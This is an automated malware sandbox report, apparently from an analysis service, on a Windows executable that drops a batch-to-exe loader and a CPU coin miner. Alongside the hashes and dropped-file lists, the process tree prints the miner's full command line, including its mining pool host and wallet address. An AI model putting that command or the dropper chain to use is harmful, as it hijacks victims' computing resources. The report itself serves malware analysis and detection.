73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
294s
max time network
298s
platform
windows10-1703_x64
resource
win10-20231215-ja
resource tags

arch:x64arch:x86image:win10-20231215-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
13/02/2024, 07:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
2460	b2e.exe
2912	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
2912	cpuminer-sse2.exe
2912	cpuminer-sse2.exe
2912	cpuminer-sse2.exe
2912	cpuminer-sse2.exe
2912	cpuminer-sse2.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 2580 wrote to memory of 2460	2580	batexe.exe	74
PID 2580 wrote to memory of 2460	2580	batexe.exe	74
PID 2580 wrote to memory of 2460	2580	batexe.exe	74
PID 2460 wrote to memory of 3820	2460	b2e.exe	75
PID 2460 wrote to memory of 3820	2460	b2e.exe	75
PID 2460 wrote to memory of 3820	2460	b2e.exe	75
PID 3820 wrote to memory of 2912	3820	cmd.exe	78
PID 3820 wrote to memory of 2912	3820	cmd.exe	78

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2580
- C:\Users\Admin\AppData\Local\Temp\8F5F.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\8F5F.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\8F5F.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2460
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\91C0.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3820
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2912

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\8F5F.tmp\b2e.exe

Filesize
3.7MB

MD5
1159e61025af4499c4aee245391fbaa7

SHA1
6941af22b356ba5b630cd97791029006a9ac5fa4

SHA256
09acfb4f01e9780934a8a94c5fc693816d92723dbcad062494742a9d0168ce8e

SHA512
4413550ea82a8f3ffccb42094a208abfc0c4b033e646e7766ed6610e82eadceec6961af17c5302770a3cfa7185b72e9170a0f21de157628c4f7303cb03c452bf

Download Submit
C:\Users\Admin\AppData\Local\Temp\8F5F.tmp\b2e.exe

Filesize
3.4MB

MD5
d71b8d3f4a5ed91f5953e22182d3545d

SHA1
0ae8b80eaa2350342ad465162167b7a7b2b708e2

SHA256
7784897651032862ef51e25f07a3ca75ec3ab562f2b948b986b9a77ea237d6a5

SHA512
72eb20f114423f6cf6d6f72ea3ec57196dca7de4de2ef190658a25091e9873a8fbee1919bb229bcb5b91fd5dfe19d46de632b4b6db7d8b3d281bf4ab91fc6de0

Download Submit
C:\Users\Admin\AppData\Local\Temp\91C0.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
792KB

MD5
75db468ac7ccc98535c2d9cb004826f2

SHA1
ec351670d047820cfec2cf4c134deb5ae243bc89

SHA256
2228314c80fa617281c86b645597919bd3e07dadd4c43b0ce2fe8f047c959b25

SHA512
6e1e0577ae5ffa76cfecbfb04d6b07741cde1bf1c119e882448cfb526267e9d89d1b85bf5c374e1fc0a4c62c752e142471090b3321269b92a287a27093e3bc3c

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
683KB

MD5
cd9ead8ef8a8199b8004e3eacb0805c4

SHA1
4e1430e88a77250c1ac4417ead504903338ca645

SHA256
c4c0d729ff978a491f731e1376b85af0772034bf92cd7120256d425b91efc384

SHA512
833aa3ae9b9fd03eed591f6d86145565acfcab5c2a6150d72033c8e7e9f6a7da9275bc1519ca772c7411e7292e782c7b2f9d1fc646c7db42e7976c403297e395

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
355KB

MD5
490484b48abeb747b162f8e564c6510f

SHA1
867e8dc6fb788d45229578f6819af7af693f2477

SHA256
dc92011d651371df9c4d2397d3f9d98826856e833ae8ba1779b68628b103a972

SHA512
110b180108964ccedab1be2dd052a9c313c336cd6659d04323383095fab997f01fad7f288c3e093cb6f61f20935de3df45ca1f460db50992bfe77f9b64917c86

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
547KB

MD5
61348dad000ccd81c1b0761e9d4906b5

SHA1
070be24e191b2535d206962d811a634340753bcb

SHA256
9b0d8bff3a11029595d825b941895010028e4a5f51eff219882b12b33451c35a

SHA512
c2a990106246d094f6ce087880fc86748909946c1e4cd19ce7b4148e4929ac11097db3a16ade5029b4b5545afe6dbc2a23f1bbdb51182c157be4fa34c45f5e0f

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
382KB

MD5
5992c4d4ec9d420397802d1f4e4149ec

SHA1
99b09b1b3b47bc404f6df37914395a1c625d9ab6

SHA256
c99c7b165e5eb3a57468226a1583bf8e7f3af8c47bd3511637d7dce9ad427fa6

SHA512
d3d6436262aecfa7824ffdcb0d43ce8819029c77edc12812c987a094621d0a7d0c87efb9c685dbe76e4752a729d50b828f401348ab3ef8c3f295610f40e10c2e

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
287KB

MD5
37828ffa1036925ca0264101fc1801ce

SHA1
566a298f6f2a2f0250a413d69837d2525424e504

SHA256
5368ced32e23f31f7383208dccfc4e81282744198df26b56754b6cd75a7093fa

SHA512
16674742591dea35ff6b57b6cd054e702c7319cc9fbc937405cbffeda3f44df13594b09f602d7cd02dd3776157dabcc3a6f336cb6beeaff62fd980adffcd2438

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
424KB

MD5
f75e6aa5f411c23d220dfabd9eb3ea79

SHA1
9b400a46a76fd723575320e1f12c05d67f815d67

SHA256
9fb4f0e3b217963fdd516b08908b7c29b5e20be6f039755ef9ce909c52718b45

SHA512
890ea92f14b049a645ccd167ed7d6bcaa0c76c37637cb62153b0a424eab100920fca09b693bddbdd888c11db4c7cf78b2a6ec393534e3495fcbecaaca4be6147

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
617KB

MD5
97467615ace0548d8c6f700ab9233b46

SHA1
9e656bb24bd04a9366342bd6617968aa2b72bf38

SHA256
b275c876b9d64d8faba1496cc87e373def31d4db99f3dd5a6e5536d7f16b3bfc

SHA512
1515841eaaa3ccacc3b17c907e2c5237eb4df35119ab65cfff1f204cd5f3e4cab8eb49ef13657054e3325592c52600e03d221e4747528da3cb7de1e889e889d3

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
511KB

MD5
b0f334af229535f5e88ed430256881c4

SHA1
edd737253a3b16118566674e3d84f0afdf264663

SHA256
930b34ec23d40661b6badb552f91b6112e89a0b22d86e9beadd6bd0aa85b35af

SHA512
aa2902d9927d95635b8e498210443b9f8bd5a25ed040110c65a9085ff932318e50f7fcc1473c8bb037b4893ac10f4e9a6c7241e8dd2c15abacd2c6f778052325

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
34KB

MD5
11c8f16f33c200c50dca3779de1e1a89

SHA1
da54d0cbf8e194ff44bbd51e86d751d58301202a

SHA256
92a01990f1e74fcc9927306796fac573becf0e2ba89da59008becf3d61d3adf1

SHA512
9c63a37003ccffed65c38aae3769e03dd691a6697c8c98f31dc7b05c34c782d4d43e0cb4454598753086681b188f484585eda18fa2947ccef3e00822c2f31981

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
329KB

MD5
17dbc85e780c26fb1b32d647c0a23ef0

SHA1
3f93d13bae707dc77beb1a907d662236b0321fd6

SHA256
5afad67f191f634d659e52917c4f0f5666f9e946ec8ec3e026b3854e91790063

SHA512
952bfdb79303ff7f618f9603f9e172c41633fd7dbc680caf249c9be3792df8fc3354793e75529f05a1a9575f9b1171c7f455966cf215163610b4aae0037000af

Download Submit
memory/2460-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2460-4-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2580-6-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/2912-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2912-42-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/2912-41-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/2912-44-0x0000000001040000-0x00000000028F5000-memory.dmp

Filesize
24.7MB

Download
memory/2912-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2912-43-0x000000005C0D0000-0x000000005C168000-memory.dmp

Filesize
608KB

Download
memory/2912-51-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2912-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2912-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2912-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2912-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2912-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2912-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2912-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2912-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2912-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download